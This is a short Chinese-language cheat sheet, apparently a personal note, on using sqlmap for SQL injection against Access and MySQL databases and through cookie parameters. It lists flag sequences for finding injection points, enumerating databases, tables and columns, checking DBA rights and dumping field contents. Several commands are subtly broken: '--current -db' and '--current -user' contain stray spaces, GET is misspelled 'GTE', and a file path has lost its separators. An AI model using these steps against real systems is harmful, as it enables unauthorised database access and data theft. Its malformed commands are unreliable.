sqlmap将检测结果保存到C:UsersAdministrator.sqlmapoutput (windows)
linux:(/root/.sqlmap/output)
Access注入
1.检测是否存在注入点
2.--tables 检测表名
3.--columns -T “表名”检测那个表中的字段
4.--dump -C "字段名" -T ”表名“ 检测那个表中那个字段中的内容
mysql注入
1.检测是否存在注入点
2.--dbs 当前所有数据库
3.--current -db 当前正在使用的数据库
4.--current -user 检测当前用户
5.--version 检测版本信息
6.--is-dba 检测当前用户是否为数据库管理员
7.以后步骤依照Access注入,-D 指定数据库
Cookie注入
1.检测注入点 --cookie "id=16"--level 2
level 最多5级 risk 最多三级
level 指定探测等级
level 1, 探测GTE,POST
level 2 探测Cookie数据
2.--cookie “id=16”--level 2 --tables 检测表名
3.--cookie “id=16”--level 2 --columns -T "表名“ 检测那个表中的字段名
4.--cookie “id=16”--level 2 --dump -C ”那个字段“ -T "表名“ 检测那个表中那个字段中的内容
【本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言】